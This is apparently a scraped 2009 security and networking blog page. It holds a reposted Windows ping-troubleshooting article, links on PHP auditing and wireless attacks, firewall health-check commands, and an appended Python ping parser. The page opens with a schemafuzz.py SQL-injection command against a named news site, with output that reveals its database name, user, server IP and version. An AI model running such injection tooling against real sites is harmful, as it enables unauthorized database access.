http://www.ayamitiklembu/news...rkc0de,2,3</font><br />[-] Done!<br /><br /><font color=royalblue> schemafuzz.py -u http://www.ayamitiklembu/news...rkc0de,2,3 <font color=yellow>--fuzz </font></font><br /><br />|---------------------------------------------------------------|<br />| rsauron[@]gmail[dot]com v5.0 |<br />| 6/2008 schemafuzz.py |<br />| -MySQL v5+ 
Information_schema Database Enumeration |<br />| -MySQL v4+ Data Extractor |<br />| -MySQL v4+ Table & Column Fuzzer |<br />| Usage: schemafuzz.py [options] |<br />| -h help darkc0de.com |<br />|---------------------------------------------------------------|<br /><br />[+] URL: http://www.ayamitiklembu/news...c0de,2,3--<br />[+] Evasion Used: "+" "--"<br />[+] 23:43:22<br />[-] Proxy Not Given<br />[+] Gathering MySQL Server Configuration...<font color=orange><br />Database: web27-gc<br />User: web27-gc@79.170.40.171<br />Version: 5.0.77-community<br />[+] Number of tables names to be fuzzed: 338<br />[+] Number of column names to be fuzzed: 249</font><br />[+] Searching for tables and columns...<br /><br /><b>Reference: </b><br /><a href="http://www.hackforums.net/showthread.php?tid=79972" target="_blank">http://www.hackforums.net/showthread.php?tid=79972</a><br /><br /><span style="font-weight:bold;">Troubleshooting Connectivity Problems on Windows Networks</span> (2009-05-25)<br />This article series will explain various troubleshooting techniques that you can use when machines on a Windows network have difficulty communicating with each other.<br /><br />Today’s network hardware and software are more reliable than ever, but even so, things do occasionally go wrong. In this article series, I am going to discuss some troubleshooting techniques that you can use when a host on your Windows network has trouble communicating with other network hosts. 
For the sake of those with less experience in working with the TCP/IP protocol, I’m going to start with the basics, and then work toward the more advanced techniques.<br /><br /><span style="font-weight:bold;">Verify Network Connectivity</span><br /><br />When one host has trouble communicating with another, the first thing that you must do is to gather some information about the problem. More specifically, you need to document the host’s configuration, find out if the host is having trouble communicating with any other machines on the network, and find out if the problem affects any other hosts.<br /><br />For example, suppose that a workstation is having trouble communicating with a particular server. That in itself doesn’t really give you a lot to go on. However, if you were to dig a little bit deeper into the problem and find out that the workstation couldn’t communicate with any of the network servers, then you would know to check for a disconnected network cable, a bad switch port, or maybe a network configuration problem.<br /><br />Likewise, if the workstation were able to communicate with some of the network servers, but not all of them, that too would give you a hint as to where to look for the problem. In that type of situation, you would probably want to check to see what the servers that could not be contacted had in common. Are they all on a common subnet? If so, then a routing problem is probably to blame.<br /><br />If multiple workstations are having trouble communicating with a specific server, then the problem probably isn’t related to the workstations unless those workstations were recently reconfigured. More than likely, it is the server itself that is malfunctioning.<br /><br />The point is that by starting out with a few basic tests, you can gain a lot of insight into the problem at hand. 
The tests that I am about to show you will rarely show you the cause of the problem, but they will help to narrow things down so that you will know where to begin the troubleshooting process.<br /><br /><span style="font-weight:bold;">PING</span><br /><br />PING is probably the simplest TCP/IP diagnostic utility ever created, but the information that it can provide you with is invaluable. Simply put, PING tells you whether or not your workstation can communicate with another machine.<br /><br />The first thing that I recommend doing is opening a Command Prompt window, and then entering the PING command, followed by the IP address of the machine that you are having trouble communicating with. When you do, the machine that you have specified should produce four replies, as shown in Figure A.<br /><br /><a href="http://www.windowsnetworking.com/img/upl/image0021218182403357.jpg"><img style="cursor:pointer; cursor:hand;width: 574px; height: 284px;" src="http://www.windowsnetworking.com/img/upl/image0021218182403357.jpg" border="0" alt="" /></a><br />Figure A: The specified machine should generate four replies<br /><br />The responses essentially tell you how long it took the specified machine to respond with thirty-two bytes of data. For example, in Figure A, each of the four responses was received in less than four milliseconds.<br /><br />Typically, when you issue the PING command, one of four things will happen, each of which has its own meaning.<br /><br />The first thing that can happen is that the specified machine will produce four replies. This indicates that the workstation is able to communicate with the specified host at the TCP/IP level.<br /><br />The second thing that can happen is that all four requests time out, as shown in Figure B. If you look at Figure A, you will notice that each response ends in TTL=128. TTL stands for Time To Live. 
What this means is that each of the four queries and responses must be completed within 128 milliseconds. The TTL is also decremented once for each hop on the way back. A hop occurs when a packet moves from one network to another. I will be talking a lot more about hops later on in this series.<br /><br /><a href="http://www.windowsnetworking.com/img/upl/image0041218182403373.jpg"><img style="cursor:pointer; cursor:hand;width: 574px; height: 284px;" src="http://www.windowsnetworking.com/img/upl/image0041218182403373.jpg" border="0" alt="" /></a><br />Figure B: If all four requests time out, it could indicate a communications failure<br /><br />At any rate, if all four requests have timed out, it means that the TTL expired before the reply was received. This can mean one of three things:<br /><br />1. Communications problems are preventing packets from flowing between the two machines. This could be caused by a disconnected cable, a bad routing table, or a number of other issues.<br />2. Communications are occurring, but are too slow for PING to acknowledge. This can be caused by extreme network congestion, or by faulty network hardware or wiring.<br />3. Communications are functional, but a firewall is blocking ICMP traffic. PING will not work unless the destination machine’s firewall (and any firewalls between the two machines) allow ICMP echoes.<br /><br />A third thing that can happen when you enter the PING command is that some replies are received, while others time out. 
This can point to bad network cabling, faulty hardware, or extreme network congestion.<br /><br />The fourth thing that can occur when pinging a host is that you receive an error similar to the one that is shown in Figure C.<br /><br /><a href="http://www.windowsnetworking.com/img/upl/image0061218182403373.jpg"><img style="cursor:pointer; cursor:hand;width: 574px; height: 288px;" src="http://www.windowsnetworking.com/img/upl/image0061218182403373.jpg" border="0" alt="" /></a><br />Figure C: This type of error indicates that TCP/IP is not configured correctly<br /><br />The PING: Transmit Failed error indicates that TCP/IP is not configured correctly on the machine on which you are trying to enter the PING command. This particular error is specific to Vista, though. Older versions of Windows also produce an error when TCP/IP is configured incorrectly, but the error message is “Destination Host Unreachable”.<br /><br /><span style="font-weight:bold;">What if the PING is Successful?</span><br /><br />Believe it or not, it is not uncommon for a ping to succeed, even though two machines are having trouble communicating with each other. If this happens, it means that the underlying network infrastructure is good, and that the machines are able to communicate at the TCP/IP level. Typically, this is good news, because it means that the problem that is occurring is not very serious.<br /><br />If normal communications between two machines are failing, but the two machines can PING each other successfully (be sure to run the PING command from both machines), then there is something else that you can try. 
Rather than pinging the network host by IP address, try replacing the IP address with the host’s fully qualified domain name, as shown in Figure D.<br /><br /><a href="http://www.windowsnetworking.com/img/upl/image0081218182416498.jpg"><img style="cursor:pointer; cursor:hand;width: 574px; height: 284px;" src="http://www.windowsnetworking.com/img/upl/image0081218182416498.jpg" border="0" alt="" /></a><br />Figure D: Try pinging the network host by its fully qualified domain name<br /><br />If you are able to ping the machine by its IP address, but not by its fully qualified domain name, then you most likely have a DNS issue. The workstation may be configured to use the wrong DNS server, or the DNS server may not contain a host record for the machine that you are trying to ping.<br /><br />If you look at Figure D, you can see that the machine’s IP address is listed just to the right of its fully qualified domain name. This proves that the machine was able to resolve the fully qualified domain name. Make sure that the IP address that the name was resolved to is correct. If you see a different IP address than the one that you expected, then you may have an incorrect DNS host record.<br /><br /><span style="font-weight:bold;">Conclusion</span><br /><br />In this article, I have shown you some steps for testing basic connectivity between two machines. In the next article in the series, I will show you some more techniques that you can use in the troubleshooting process.<br /><br />**************************************************<br />Published: Aug 14, 2008<br />Updated: Sep 26, 2008<br />Section: Articles & Tutorials :: Network Troubleshooting<br />Author: Brien M. 
Posey<br />If you would like to read the other parts of this article, please go to:<br /><br /><a href="http://www.windowsnetworking.com/articles_tutorials/Troubleshooting-Connectivity-Problems-Windows-Networks-Part2.html" target="_blank">Troubleshooting Connectivity Problems on Windows Networks (Part 2)</a><br /><a href="http://www.windowsnetworking.com/articles_tutorials/Troubleshooting-Connectivity-Problems-Windows-Networks-Part3.html" target="_blank">Troubleshooting Connectivity Problems on Windows Networks (Part 3)</a><br /><a href="http://www.windowsnetworking.com/articles_tutorials/Troubleshooting-Connectivity-Problems-Windows-Networks-Part4.html" target="_blank">Troubleshooting Connectivity Problems on Windows Networks (Part 4)</a><br /><a href="http://www.windowsnetworking.com/articles_tutorials/Troubleshooting-Connectivity-Problems-Windows-Networks-Part5.html" target="_blank">Troubleshooting Connectivity Problems on Windows Networks (Part 5)</a><br /><br /><a href="http://www.windowsnetworking.com/articles_tutorials/Troubleshooting-Connectivity-Problems-Windows-Networks-Part1.html" target="_blank">http://www.windowsnetworking.com/articles_tutorials/Troubleshooting-Connectivity-Problems-Windows-Networks-Part1.html</a><br /><br /><a href="http://searchnetworking.techtarget.com/tip/0,289483,sid7_gci1355527_mem1,00.html" target="_blank">http://searchnetworking.techtarget.com/tip/0,289483,sid7_gci1355527_mem1,00.html</a><br /><br /><span style="font-weight:bold;">20 ways to PHP Source code fuzzing (Auditing)</span> (2009-04-25)<br /><br />Hello.<br /><br />This article is only for those who know PHP well and really know how to program in PHP.<br /><br />When we talk about PHP vulnerability discovery, we forget this question:<br />What types of bugs?<br /><br />When we can answer this question, we 
will find vulnerabilities as easily as drinking water.<br /><br />Reading in this article:<br /><br />Section 1: (20 ways to PHP source code Auditing - PHP Fuzzing)<br />1- Cross Site Scripting<br />2- SQL Injection [Medium]<br />3- HTTP Response Splitting [Medium]<br />4- Dynamic Evaluation Vulnerabilities [High]<br />5- Process Control / PHP Code Injection [High]<br />6- Local / Remote File Inclusion [High]<br />7- File Management [High]<br />8- Buffer Overflows [High, but hard to use]<br />9- Cookie / Session Injection / Fixation [High]<br />10- Denial of Service [Medium, but hard to assess]<br />11- XPath Injection [XML functions]<br />12- Often Misused: File Uploads [High]<br />13- Unauthorized invocation of functionality / files [Medium]<br />14- Authentication Bypass with Brute Force [Low]<br />15- Insecure Randomness in Session / Cookie / Backup files [Medium]<br />16- Informative details in HTML Comments [Low]<br />17- Default unnecessary installation files [Medium]<br />18- Regular Expression Vulnerability [High]<br />19- Resource Injection [Medium]<br />20- Weak Password / Encryption [Low]<br /><br />Section 2:<br />Automatic PHP source code auditor<br /><br />This article is not a full reference on PHP source code security review (a.k.a. auditing), but I tried to do this work as well as I could in my short time. So please accept my apologies for any mistakes I (maybe) made while completing this article. 
I’m not sure, but maybe I’ll release a future version of this article that contains a few more advanced methods.<br /><br />Here are some topics I may add to this article in the next version:<br />1- More real-world attacks with descriptions<br />2- PHPIDS defense<br />3- More dangerous functions: cURL, sockets, create_function, etc.<br />4- PEAR functions and their secure use<br />5- Information about books on PHP secure coding<br />6- etc.<br /><br />Download:<br /><br /><a href="http://abysssec.com/blog/wp-content/uploads/2009/03/php-fuzzing-auditing-version-10.pdf" target="_blank">php-fuzzing-auditing-version-1.0</a><br /><br />Thanks.<br /><br />Daphne<br /><br /><a href="http://abysssec.com/blog/2009/03/php_fuzz_audit/" target="_blank">http://abysssec.com/blog/2009/03/php_fuzz_audit/</a><br /><br /><span style="font-weight:bold;">Information Gathering</span> (2009-04-20)<br />New School Information Gathering<br /><a href="http://www.toorcon.org/tcx/17_Gates.pdf" target="_blank">http://www.toorcon.org/tcx/17_Gates.pdf</a><br />@<br /><a href="http://www.carnal0wnage.com/research/newschoolinfogathering-chicagocon.pdf" target="_blank">http://www.carnal0wnage.com/research/newschoolinfogathering-chicagocon.pdf</a><br /><br />Information Gathering: The Complete Documentation<br /><a href="http://www.l0t3k.org/security/docs/gathering/" target="_blank">http://www.l0t3k.org/security/docs/gathering/</a><br /><br />Passive Information Gathering Techniques<br /><a href="http://seclists.org/basics/2004/Feb/0073.html" target="_blank">http://seclists.org/basics/2004/Feb/0073.html</a><br /><br /><span style="font-weight:bold;">Caffe Latte attack</span> (2009-04-19)<br /><object width="425" height="344"><param name="movie" 
value="http://www.youtube.com/v/5A-9jAvvQpY&hl=en&fs=1"></param><param name="allowFullScreen" value="true"></param><param name="allowscriptaccess" value="always"></param><embed src="http://www.youtube.com/v/5A-9jAvvQpY&hl=en&fs=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"></embed></object><br /><br /><a href="http://www.security-freak.net/toorcon/cafe-latte-wireless-attack.html" target="_blank">http://www.security-freak.net/toorcon/cafe-latte-wireless-attack.html</a><br /><br /><object width="425" height="344"><param name="movie" value="http://www.youtube.com/v/7eU8y_7W50Q&hl=en&fs=1"></param><param name="allowFullScreen" value="true"></param><param name="allowscriptaccess" value="always"></param><embed src="http://www.youtube.com/v/7eU8y_7W50Q&hl=en&fs=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"></embed></object><br /><br />The Caffe Latte Attack: How It Works—and How to Block It<br />By Lisa Phifer<br />December 12, 2007<br /><br /><a href="http://www.wi-fiplanet.com/tutorials/article.php/3716241" target="_blank">http://www.wi-fiplanet.com/tutorials/article.php/3716241</a><br /><br /><a href="http://www.wi-fiplanet.com/tutorials/article.php/10724_3716241_2">http://www.wi-fiplanet.com/tutorials/article.php/10724_3716241_2</a><br /><br /><span style="font-weight:bold;">Wireless Attacks and Penetration Testing</span> (2009-04-18)<br />Wireless Attacks and Penetration Testing (part 1 of 3)<br />Jonathan Hassell 2004-06-03<br /><a href="http://www.securityfocus.com/infocus/1783" target="_blank">http://www.securityfocus.com/infocus/1783</a><br /><br />Wireless Attacks and Penetration Testing (part 2 of 3)<br />Jonathan Hassell 2004-06-14<br /><a href="http://www.securityfocus.com/infocus/1785" 
target="_blank">http://www.securityfocus.com/infocus/1785</a><br /><br />Wireless Attacks and Penetration Testing (part 3 of 3)<br />Jonathan Hassell 2004-07-26<br /><a href="http://www.securityfocus.com/infocus/1792" target="_blank">http://www.securityfocus.com/infocus/1792</a><br /><br /><a href="http://www.securityfocus.com/pen-test/images/thumb_hassell-fig1-part2-airsnort.gif"><img style="cursor:pointer; cursor:hand;width: 600px; height: 450px;" src="http://www.securityfocus.com/pen-test/images/thumb_hassell-fig1-part2-airsnort.gif" border="0" alt="" /></a><br />Figure 1: Sniffing packets with AirSnort<br /><br /><span style="font-weight:bold;">Checkpoint Firewall - IPSO Standard Health Check</span> (2009-03-28)<br />GUI = SmartView Monitor<br /><br />CLI as below:<br /><pre style="border: thin solid rgb(0, 51, 51); padding: 5px; overflow: auto; font-family: courier; background-color: rgb(24, 24, 24); font-size: 12px; color: rgb(255, 255, 255); line-height: 14px; width: 90%;"><span style="font-weight:bold;">fw stat<br />cpstat fw<br />cphaprob stat</span><br /></pre><br />Run cphaprob stat to check the HA state.<br /><br />For a Nokia box, run<pre style="border: thin solid rgb(0, 51, 51); padding: 5px; overflow: auto; font-family: courier; background-color: rgb(24, 24, 24); font-size: 12px; color: rgb(255, 255, 255); line-height: 14px; width: 90%;"><span style="font-weight:bold;">clish<br />show vrrp</span><br /></pre><br /><br /><span style="font-weight:bold;">Checkpoint Firewall - Fw Monitor</span> (2009-03-27)<br />[PDF] <br />How to use fw monitor<br />http://www.checkpoint.com/techsupport/downloads/html/ethereal/fw_monitor_rev1_01.pdf<br /><br />[DOC] <br />FW MONITOR<br 
/>www.cpug.org/check_point_resources/FW%20MONITOR_expert.doc<br /><br />[PDF] <br />Fw Monitor<br />www.nokia.com/NOKIA_COM_1/About_Nokia/Press/White_Papers/pdf_files/technicalwhitepaper_fwmonitoring.pdf<br /><br /><span style="font-weight:bold;">grep pix log</span> (2009-03-27)<br /><pre style="border: thin solid rgb(0, 51, 51); padding: 5px; overflow: auto; font-family: courier; background-color: rgb(24, 24, 24); font-size: 12px; color: rgb(255, 255, 255); line-height: 14px; width: 90%;"># severity-1 PIX syslog messages from the 20:xx hour, with connection build/teardown and ACL noise filtered out<br />grep "Sep 26 20:" pix.log | grep -v -e Teardown -e Built -e Deny -e Accessed -e access-list -e Inbound | grep "PIX-1-"<br /></pre><br /><br /><span style="font-weight:bold;">Cisco Pix Firewall - Standard Health Check</span> (2009-03-26)<br />1. <pre style="border: thin solid rgb(0, 51, 51); padding: 5px; overflow: auto; font-family: courier; background-color: rgb(24, 24, 24); font-size: 12px; color: rgb(255, 255, 255); line-height: 14px; width: 90%;">sh fail<br /></pre>- to check which unit (primary or secondary) is currently active and which is standby<br />- to see the date of the last failover<br />- to check the status of all firewall interfaces<br /><br />2. <pre style="border: thin solid rgb(0, 51, 51); padding: 5px; overflow: auto; font-family: courier; background-color: rgb(24, 24, 24); font-size: 12px; color: rgb(255, 255, 255); line-height: 14px; width: 90%;">sh conn count<br /></pre>- to check how many connections there are; if there are many, the firewall is indeed passing traffic<br /><br />3. <pre style="border: thin solid rgb(0, 51, 51); padding: 5px; overflow: auto; font-family: courier; background-color: rgb(24, 24, 24); font-size: 12px; color: rgb(255, 255, 255); line-height: 14px; width: 90%;">sh conn</pre>- to view the connections<br /><br />4. 
<pre style="border: thin solid rgb(0, 51, 51); padding: 5px; overflow: auto; font-family: courier; background-color: rgb(24, 24, 24); font-size: 12px; color: rgb(255, 255, 255); line-height: 14px; width: 90%;">sh mem</pre>- to check firewall memory<br /><br />5. <pre style="border: thin solid rgb(0, 51, 51); padding: 5px; overflow: auto; font-family: courier; background-color: rgb(24, 24, 24); font-size: 12px; color: rgb(255, 255, 255); line-height: 14px; width: 90%;">sh cpu usage</pre>- to check firewall CPU utilization<br /><br />6. <pre style="border: thin solid rgb(0, 51, 51); padding: 5px; overflow: auto; font-family: courier; background-color: rgb(24, 24, 24); font-size: 12px; color: rgb(255, 255, 255); line-height: 14px; width: 90%;">sh int</pre>- to check all interfaces on the firewall<br /><br /><span style="font-weight:bold;">Vulnerability Assessment for SQL Injection</span> (2009-03-07)<br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHPMopb2IpBaZjIvegUpVPjo3TtZ5CgBoot3YGYbZjWCG1tWppPy92XkcXUNxcOTTUBibkMguZXMvr9LsD2flT1e4NnWtNyQfNIMmqqDgZFYjKvyhuSmqrWwdPwhgk3IYZwNuRYy5_qDGZ/s1600-h/SQL_Injection_assess_vulnerability.gif"><img style="cursor:pointer; cursor:hand;width: 279px; height: 320px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHPMopb2IpBaZjIvegUpVPjo3TtZ5CgBoot3YGYbZjWCG1tWppPy92XkcXUNxcOTTUBibkMguZXMvr9LsD2flT1e4NnWtNyQfNIMmqqDgZFYjKvyhuSmqrWwdPwhgk3IYZwNuRYy5_qDGZ/s320/SQL_Injection_assess_vulnerability.gif" border="0" alt="" id="BLOGGER_PHOTO_ID_5310661473823165330" /></a><br /><br /><a href="http://www.zubrag.com/tools/sql-injection-test.php" target="_blank">Online Tools - SQL Injection</a><br /><br />(2009-02-14)<br />One of my students just copy-pasted everything 
from here for their wireless assignment... got you! :P<br /><br /><a href="http://technet.microsoft.com/en-us/library/bb457019.aspx" target="_blank">http://technet.microsoft.com/en-us/library/bb457019.aspx</a><br /><br /><span style="font-weight:bold;">2.4GHz vs. 5GHz Deployment Considerations</span> (2009-02-14)<br />When deploying a wireless LAN, companies must decide whether to use network interface cards (NICs) and access points designed to operate in the 2.4GHz band, the 5GHz band, or both. Not too long ago the choice of frequency band was easy, when only 2.4GHz (i.e., 802.11b) products were available. Now, 802.11b and 802.11g products are both available that operate in the 2.4GHz band, while 802.11a uses the 5GHz band. This can cause confusion when designing a WLAN, so let's take a look at what you need to consider when making this critical decision.<br /><br /><a href="http://www.wi-fiplanet.com/tutorials/article.php/1569271">http://www.wi-fiplanet.com/tutorials/article.php/1569271</a>
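For the PING procedure in the "Troubleshooting Connectivity Problems on Windows Networks" post above (four replies, all requests timing out, partial replies, the transmit-failed / "Destination Host Unreachable" error, and the name-versus-address check of Figure D), the following is an added Python example; it is not code from the original post or from Brien Posey's article. It parses captured Windows ping output, classifies it into those cases, and checks that a ping by fully qualified domain name resolved to the address you expected. All sample outputs, host names and addresses in it are constructed, and the hop estimate assumes the replying host is a Windows machine that sends replies with an initial TTL of 128 (the TTL shown is the reply's remaining hop count, decremented once per hop on the way back, as the post notes).

```python
import re
from dataclasses import dataclass
from typing import Optional

# Windows hosts send echo replies with an initial TTL of 128, and each hop on the
# way back decrements it by one, so 128 - TTL estimates the return hop count.
# Assumption: the replying host is Windows (other systems start at 64 or 255).
WINDOWS_INITIAL_TTL = 128

RE_HEADER = re.compile(r"^Pinging (\S+?)(?: \[([\d.]+)\])? with \d+ bytes of data:")
RE_REPLY = re.compile(r"^Reply from [\d.]+: bytes=\d+ time[=<](\d+)ms TTL=(\d+)")
RE_TIMEOUT = re.compile(r"^Request timed out\.")
RE_MISCONFIG = re.compile(r"^(?:PING: transmit failed|(?:Reply from [\d.]+: )?Destination host unreachable)", re.I)
RE_NAME_FAIL = re.compile(r"^Ping request could not find host")


@dataclass
class PingResult:
    outcome: str                # all_replied | all_timed_out | partial_loss | tcpip_misconfigured | name_not_resolved | no_data
    target: str                 # name or address typed on the command line
    resolved_ip: Optional[str]  # address shown in [...] when a name was pinged
    replies: int
    timeouts: int
    max_rtt_ms: Optional[int]
    est_hops: Optional[int]


def parse_ping(output: str) -> PingResult:
    """Parse one Windows ping run and classify it into the post's four cases."""
    target, resolved_ip = "", None
    replies = timeouts = 0
    rtts, ttls = [], []
    misconfigured = name_failed = False
    for raw in output.splitlines():
        line = raw.strip()
        if m := RE_HEADER.match(line):
            target, resolved_ip = m.group(1), m.group(2)
        elif m := RE_REPLY.match(line):
            replies += 1
            rtts.append(int(m.group(1)))
            ttls.append(int(m.group(2)))
        elif RE_TIMEOUT.match(line):
            timeouts += 1
        elif RE_MISCONFIG.match(line):
            misconfigured = True   # Figure C on Vista; "Destination Host Unreachable" on older Windows
        elif RE_NAME_FAIL.match(line):
            name_failed = True     # DNS could not resolve the name at all

    if name_failed:
        outcome = "name_not_resolved"
    elif misconfigured:
        outcome = "tcpip_misconfigured"   # fourth case: TCP/IP not configured correctly on this machine
    elif replies and not timeouts:
        outcome = "all_replied"           # first case: connectivity at the TCP/IP level is fine
    elif timeouts and not replies:
        outcome = "all_timed_out"         # second case: link/routing fault, congestion, or ICMP blocked
    elif replies and timeouts:
        outcome = "partial_loss"          # third case: bad cabling, faulty hardware or heavy congestion
    else:
        outcome = "no_data"

    est_hops = WINDOWS_INITIAL_TTL - min(ttls) if ttls and min(ttls) <= WINDOWS_INITIAL_TTL else None
    return PingResult(outcome, target, resolved_ip, replies, timeouts, max(rtts) if rtts else None, est_hops)


def check_name_resolution(output: str, expected_ip: str) -> str:
    """Figure D check: after pinging by fully qualified domain name, confirm the
    name resolved and that it resolved to the address you expected."""
    result = parse_ping(output)
    if result.resolved_ip is None:
        return "not_resolved"   # wrong DNS server, or no host record for the name
    if result.resolved_ip != expected_ip:
        return "wrong_record"   # name resolves, but to an address you did not expect
    return "ok"


# Constructed sample outputs (not captured from any real network).
SAMPLE_OK = """Pinging 192.168.1.5 with 32 bytes of data:
Reply from 192.168.1.5: bytes=32 time<1ms TTL=128
Reply from 192.168.1.5: bytes=32 time=2ms TTL=128
Reply from 192.168.1.5: bytes=32 time=1ms TTL=128
Reply from 192.168.1.5: bytes=32 time=3ms TTL=128
"""
SAMPLE_TIMEOUT = """Pinging 192.168.1.9 with 32 bytes of data:
Request timed out.
Request timed out.
Request timed out.
Request timed out.
"""
SAMPLE_PARTIAL = """Pinging 10.20.0.7 with 32 bytes of data:
Reply from 10.20.0.7: bytes=32 time=41ms TTL=126
Request timed out.
Reply from 10.20.0.7: bytes=32 time=58ms TTL=126
Request timed out.
"""
SAMPLE_TRANSMIT_FAILED = """Pinging 192.168.1.5 with 32 bytes of data:
PING: transmit failed, error code 1231.
"""
SAMPLE_FQDN = """Pinging fileserver.example.com [192.168.1.5] with 32 bytes of data:
Reply from 192.168.1.5: bytes=32 time=1ms TTL=128
Reply from 192.168.1.5: bytes=32 time=1ms TTL=128
"""
SAMPLE_NAME_FAIL = "Ping request could not find host fileserver.example.com. Please check the name and try again.\n"
```

To use it on a real run, save the Command Prompt output to a file and pass its text to parse_ping; run the name-based ping from both machines, as the post advises, and feed each output to check_name_resolution with the address the DNS record should hold.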